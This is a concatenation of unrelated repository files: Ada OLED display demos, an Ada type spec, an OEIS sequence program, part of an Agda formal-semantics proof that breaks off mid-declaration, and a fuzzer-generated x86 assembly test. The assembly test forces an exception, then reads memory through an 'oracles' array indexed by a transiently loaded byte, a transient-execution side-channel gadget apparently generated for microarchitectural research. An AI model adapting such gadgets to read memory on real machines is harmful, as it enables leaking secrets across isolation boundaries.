My_Hidden_Buffer.Set_Pixel (Pt => Corner_127_127, Native => 1); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_4_White_Corners; procedure Black_Background_White_Geometry (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Draw_Circle (Center => My_Circle_Center, Radius => My_Circle_Radius); My_Hidden_Buffer.Draw_Rounded_Rect (Area => My_Rectangle, Radius => 4); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Background_White_Geometry; procedure White_Background_Black_Geometry (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Draw_Circle (Center => My_Circle_Center, Radius => My_Circle_Radius); My_Hidden_Buffer.Draw_Rounded_Rect (Area => My_Rectangle, Radius => 4); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Background_Black_Geometry; procedure White_Diagonal_Line_On_Black (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Draw_Line (Start => Corner_0_0, Stop => Corner_127_127); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end White_Diagonal_Line_On_Black; procedure Black_Diagonal_Line_On_White (S : in out SH1107.SH1107_Screen) is My_Hidden_Buffer : HAL.Bitmap.Any_Bitmap_Buffer; begin My_Hidden_Buffer := SH1107.Hidden_Buffer (This => S, Layer => THE_LAYER); My_Hidden_Buffer.Set_Source (Native => 1); My_Hidden_Buffer.Fill; SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); My_Hidden_Buffer.Set_Source (Native => 0); My_Hidden_Buffer.Draw_Line (Start => Corner_0_0, Stop => Corner_127_127); SH1107.Update_Layer (This => S, Layer => THE_LAYER); RP.Timer.Delay_Seconds (This => Another_Timer, S => 1); end Black_Diagonal_Line_On_White; procedure Show_Multiple_Demos (S : in out SH1107.SH1107_Screen; O : SH1107.SH1107_Orientation; DA : Demo_Array) is begin for D in Demos_Available'First .. Demos_Available'Last loop if DA (D) then Show_1_Demo (S, O, D); end if; end loop; end Show_Multiple_Demos; procedure Show_1_Demo (S : in out SH1107.SH1107_Screen; O : SH1107.SH1107_Orientation; Demo : Demos_Available) is My_Color_Mode : HAL.Framebuffer.FB_Color_Mode; begin My_Color_Mode := SH1107.Color_Mode (This => S); SH1107.Initialize_Layer (This => S, Layer => THE_LAYER, Mode => My_Color_Mode); S.Set_Orientation (O); Demos_Procedures (Demo).all (S); end Show_1_Demo; end Demos;

source/direccion.ads

pdibez/mundo-aspiradora

0

11396

<gh_stars>0 package direccion is type t_direccion is (Izquierda,Derecha); subtype t_posicion is t_direccion range Izquierda .. Derecha ; function direccion_opuesta(d : in t_direccion) return t_direccion; end direccion;

Transynther/x86/_processed/NONE/_un_/i9-9900K_12_0xa0_notsx.log_1_1997.asm

ljhsiun2/medusa

9

244493

<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r13 push %r15 push %r8 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_A_ht+0x1bb67, %rsi lea addresses_normal_ht+0x1ed67, %rdi nop nop nop nop dec %rax mov $84, %rcx rep movsw nop cmp $50366, %r13 lea addresses_WT_ht+0xf4e7, %r15 nop nop dec %rsi movb $0x61, (%r15) nop nop nop inc %rax lea addresses_WC_ht+0x227, %rsi lea addresses_normal_ht+0x3427, %rdi clflush (%rdi) nop nop nop nop sub $20989, %r8 mov $107, %rcx rep movsq nop add $8712, %rdi lea addresses_WT_ht+0x11e67, %rsi lea addresses_UC_ht+0xf067, %rdi nop xor %rbp, %rbp mov $120, %rcx rep movsb nop nop nop cmp %r13, %r13 lea addresses_A_ht+0xb29d, %r15 nop nop nop xor $14533, %rax and $0xffffffffffffffc0, %r15 vmovaps (%r15), %ymm4 vextracti128 $1, %ymm4, %xmm4 vpextrq $1, %xmm4, %r8 nop nop nop sub $41086, %r13 lea addresses_WT_ht+0x9237, %rsi nop cmp %rax, %rax mov (%rsi), %r8w sub $55680, %rax pop %rsi pop %rdi pop %rcx pop %rbp pop %rax pop %r8 pop %r15 pop %r13 ret .global s_faulty_load s_faulty_load: push %r12 push %r13 push %r8 push %r9 push %rcx push %rdi push %rdx push %rsi // Store lea addresses_RW+0xa287, %rdi clflush (%rdi) nop nop nop xor $19796, %rcx movb $0x51, (%rdi) nop nop nop add $47762, %rsi // Load lea addresses_WC+0x8961, %rcx clflush (%rcx) nop xor %rdx, %rdx mov (%rcx), %rdi sub $43194, %r8 // Store lea addresses_US+0x8eef, %r8 nop nop nop nop nop cmp $60423, %rsi movw $0x5152, (%r8) nop nop nop nop xor %rsi, %rsi // REPMOV lea addresses_A+0x1ce7, %rsi lea addresses_WC+0xc667, %rdi nop nop nop nop sub $17824, %r13 mov $48, %rcx rep movsl nop nop and $33070, %rdi // Store lea addresses_normal+0x1f667, %rdx clflush (%rdx) nop nop nop nop nop add %rdi, %rdi movb $0x51, (%rdx) nop nop nop nop cmp %r13, %r13 // Store lea addresses_normal+0x1e267, %rdi nop nop nop sub %r8, %r8 mov $0x5152535455565758, %rcx movq %rcx, (%rdi) dec %r9 // REPMOV lea addresses_D+0xbe67, %rsi lea addresses_PSE+0x9a7, %rdi mfence mov $97, %rcx rep movsb nop nop nop nop nop xor %rdx, %rdx // Store lea addresses_A+0x1c450, %rsi nop nop nop nop nop and $14344, %rcx movl $0x51525354, (%rsi) nop nop nop nop nop sub %r13, %r13 // Store mov $0x21f, %rdx nop nop nop nop nop dec %rdi movl $0x51525354, (%rdx) nop and %rdi, %rdi // Store lea addresses_WT+0x16a67, %rdx nop sub $12665, %r13 movw $0x5152, (%rdx) and $10567, %rdx // Store lea addresses_normal+0x16e67, %rsi nop nop nop nop and $19310, %rdx mov $0x5152535455565758, %rdi movq %rdi, (%rsi) nop nop nop nop nop cmp $65297, %r8 // REPMOV lea addresses_WT+0x15267, %rsi lea addresses_PSE+0x14a1, %rdi nop nop nop nop sub %r8, %r8 mov $33, %rcx rep movsl nop and %rcx, %rcx // Load lea addresses_WT+0x11be7, %rdx nop nop and $39994, %r8 mov (%rdx), %rcx // Exception!!! xor %rsi, %rsi div %rsi nop xor %rdi, %rdi // REPMOV lea addresses_normal+0x16e67, %rsi lea addresses_US+0x8c1f, %rdi nop nop nop nop nop cmp %r12, %r12 mov $59, %rcx rep movsw nop and $24433, %r13 // Faulty Load lea addresses_normal+0x16e67, %r9 nop nop nop dec %rcx mov (%r9), %si lea oracles, %rcx and $0xff, %rsi shlq $12, %rsi mov (%rcx,%rsi,1), %rsi pop %rsi pop %rdx pop %rdi pop %rcx pop %r9 pop %r8 pop %r13 pop %r12 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_RW', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 4}} {'src': {'type': 'addresses_WC', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_US', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 3}} {'src': {'type': 'addresses_A', 'congruent': 7, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC', 'congruent': 11, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 11}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 8, 'NT': True, 'same': False, 'congruent': 10}} {'src': {'type': 'addresses_D', 'congruent': 11, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_PSE', 'congruent': 6, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 0}} {'OP': 'STOR', 'dst': {'type': 'addresses_P', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 2}} {'OP': 'STOR', 'dst': {'type': 'addresses_WT', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 9}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'size': 8, 'NT': False, 'same': True, 'congruent': 0}} {'src': {'type': 'addresses_WT', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_PSE', 'congruent': 0, 'same': False}} {'src': {'type': 'addresses_WT', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 4}, 'OP': 'LOAD'} {'src': {'type': 'addresses_normal', 'congruent': 0, 'same': True}, 'OP': 'REPM', 'dst': {'type': 'addresses_US', 'congruent': 2, 'same': False}} [Faulty Load] {'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_A_ht', 'congruent': 7, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 8, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 5}} {'src': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}} {'src': {'type': 'addresses_WT_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 7, 'same': False}} {'src': {'type': 'addresses_A_ht', 'AVXalign': True, 'size': 32, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 2}, 'OP': 'LOAD'} {'b8': 1} b8 */

programs/oeis/138/A138977.asm

neoneye/loda

22

161780

; A138977: Number of 2 X n matrices containing a 1 in the top left entry, all entries are integer values and adjacent entries differ by at most 1. ; 3,19,121,771,4913,31307,199497,1271251,8100769,51620379,328939577,2096095523,13356910353,85113990379,542370291241,3456136077171,22023471375233,140339755317947,894284401724697,5698631790801091,36313284928708849,231398467337757579,1474536131649467657,9396159052195243283,59874968838768832353,381540145662600853339,2431281144283130643961,15492807427331511094371,98724527414188055084753,629100462189990341215787,4008805125673180168171497,25545234030952299812337331,162781417713973378013675329,1037288987874004446846377979,6609897244262137615869944537,42120124758338945523704099843,268401284331324068202448920753,1710328491285912695322326045899,10898694301676092594446486638281,69449546146588997379836102284371,442552045819418611281066769437473,2820066136149574289448122976924827,17970254769769345581012593760723897,114511518843787121909295664417367971,729699612827432471041019275878680209 mov $1,6 mov $2,1 lpb $0 sub $0,1 add $2,$1 mul $1,2 add $1,$2 mul $1,2 lpe div $1,2 mov $0,$1

Definition/LogicalRelation/Substitution/Introductions/Castlemmas.agda

CoqHott/logrel-mltt

2

13032

{-# OPTIONS --safe #-} open import Definition.Typed.EqualityRelation module Definition.LogicalRelation.Substitution.Introductions.Castlemmas {{eqrel : EqRelSet}} where open EqRelSet {{...}} open import Definition.Untyped open import Definition.Untyped.Properties open import Definition.Typed open import Definition.Typed.Properties import Definition.Typed.Weakening as Twk open import Definition.Typed.EqualityRelation open import Definition.Typed.RedSteps open import Definition.LogicalRelation open import Definition.LogicalRelation.Irrelevance open import Definition.LogicalRelation.Properties open import Definition.LogicalRelation.Application open import Definition.LogicalRelation.Substitution import Definition.LogicalRelation.Weakening as Lwk open import Definition.LogicalRelation.Substitution.Properties import Definition.LogicalRelation.Substitution.Irrelevance as S open import Definition.LogicalRelation.Substitution.Reflexivity open import Definition.LogicalRelation.Substitution.Weakening -- open import Definition.LogicalRelation.Substitution.Introductions.Nat open import Definition.LogicalRelation.Substitution.Introductions.Empty -- open import Definition.LogicalRelation.Substitution.Introductions.Pi -- open import Definition.LogicalRelation.Substitution.Introductions.SingleSubst open import Definition.LogicalRelation.Substitution.Introductions.Universe open import Definition.LogicalRelation.Substitution.MaybeEmbed open import Tools.Product open import Tools.Empty import Tools.Unit as TU import Tools.PropositionalEquality as PE import Data.Nat as Nat module cast-ΠΠ-lemmas {Γ rF F F₁} (⊢Γ : ⊢ Γ) (⊢F : Γ ⊢ F ^ [ rF , ι ⁰ ]) ([F] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F ^ [ rF , ι ⁰ ]) (⊢F₁ : Γ ⊢ F₁ ^ [ rF , ι ⁰ ]) ([F₁] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ^ [ rF , ι ⁰ ]) (recursor : ∀ {x e ρ Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) e x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) (extrecursor : ∀ {ρ Δ x y e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x≡y] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) e x ≡ cast ⁰ (wk ρ F₁) (wk ρ F) e′ y ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) where b = λ ρ e x → cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x [b] : ∀ {ρ Δ e x} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ b ρ e x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ [b] [ρ] ⊢Δ ⊢e [x] = let ⊢e′ = Idsymⱼ (univ 0<1 ⊢Δ) (un-univ (escape ([F] [ρ] ⊢Δ))) (un-univ (escape ([F₁] [ρ] ⊢Δ))) ⊢e in recursor [ρ] ⊢Δ [x] ⊢e′ [bext] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ b ρ e x ≡ b ρ e′ y ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ [bext] [ρ] ⊢Δ ⊢e ⊢e′ [x] [y] [x≡y] = let ⊢syme = Idsymⱼ (univ 0<1 ⊢Δ) (un-univ (escape ([F] [ρ] ⊢Δ))) (un-univ (escape ([F₁] [ρ] ⊢Δ))) ⊢e ⊢syme′ = Idsymⱼ (univ 0<1 ⊢Δ) (un-univ (escape ([F] [ρ] ⊢Δ))) (un-univ (escape ([F₁] [ρ] ⊢Δ))) ⊢e′ in extrecursor [ρ] ⊢Δ [x] [y] [x≡y] ⊢syme ⊢syme′ module cast-ΠΠ-lemmas-2 {t e f Γ A B F rF G F₁ G₁} (⊢Γ : ⊢ Γ) (⊢A : Γ ⊢ A ^ [ ! , ι ⁰ ]) (⊢ΠFG : Γ ⊢ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F : Γ ⊢ F ^ [ rF , ι ⁰ ]) (⊢G : (Γ ∙ F ^ [ rF , ι ⁰ ]) ⊢ G ^ [ ! , ι ⁰ ]) (A≡A : Γ ⊢ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ≅ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F ^ [ rF , ι ⁰ ]) ([G] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G [ a ] ^ [ ! , ι ⁰ ])) (G-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / ([F] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G [ a ] ≡ wk (lift ρ) G [ b ] ^ [ ! , ι ⁰ ] / ([G] [ρ] ⊢Δ [a]))) (⊢B : Γ ⊢ B ^ [ ! , ι ⁰ ]) (⊢ΠF₁G₁ : Γ ⊢ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₁ : Γ ⊢ B ⇒* Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₁ : Γ ⊢ F₁ ^ [ rF , ι ⁰ ]) (⊢G₁ : (Γ ∙ F₁ ^ [ rF , ι ⁰ ]) ⊢ G₁ ^ [ ! , ι ⁰ ]) (A₁≡A₁ : Γ ⊢ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ≅ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₁] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ^ [ rF , ι ⁰ ]) ([G₁] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ])) (G₁-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ≡ wk (lift ρ) G₁ [ b ] ^ [ ! , ι ⁰ ] / ([G₁] [ρ] ⊢Δ [a]))) (⊢e : Γ ⊢ e ∷ Id (U ⁰) A B ^ [ % , ι ¹ ]) (recursor : ∀ {ρ Δ x y t e} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G [ x ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x]) (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) e t ∷ wk (lift ρ) G₁ [ y ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [y]) (extrecursor : ∀ {ρ Δ x x′ y y′ t t′ e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → ([x′] : Δ ⊩⟨ ι ⁰ ⟩ x′ ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → ([x≡x′] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ x′ ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y′] : Δ ⊩⟨ ι ⁰ ⟩ y′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y≡y′] : Δ ⊩⟨ ι ⁰ ⟩ y ≡ y′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G [ x ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x]) → ([t′] : Δ ⊩⟨ ι ⁰ ⟩ t′ ∷ wk (lift ρ) G [ x′ ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x′]) → ([t≡t′] : Δ ⊩⟨ ι ⁰ ⟩ t ≡ t′ ∷ wk (lift ρ) G [ x ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [x]) → (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (U ⁰) (wk (lift ρ) G [ x′ ]) (wk (lift ρ) G₁ [ y′ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G [ x ]) (wk (lift ρ) G₁ [ y ]) e t ≡ cast ⁰ (wk (lift ρ) G [ x′ ]) (wk (lift ρ) G₁ [ y′ ]) e′ t′ ∷ wk (lift ρ) G₁ [ y ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [y]) (⊢t : Γ ⊢ t ∷ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (Df : Γ ⊢ t ⇒* f ∷ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ ι ⁰) ([fext] : ∀ {ρ Δ a b} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f ∘ a ^ ⁰ ≡ wk ρ f ∘ b ^ ⁰ ∷ wk (lift ρ) G [ a ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [a]) ([f] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f ∘ a ^ ⁰ ∷ wk (lift ρ) G [ a ] ^ [ ! , ι ⁰ ] / [G] [ρ] ⊢Δ [a]) ([b] : ∀ {ρ Δ e x} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) ([bext] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι 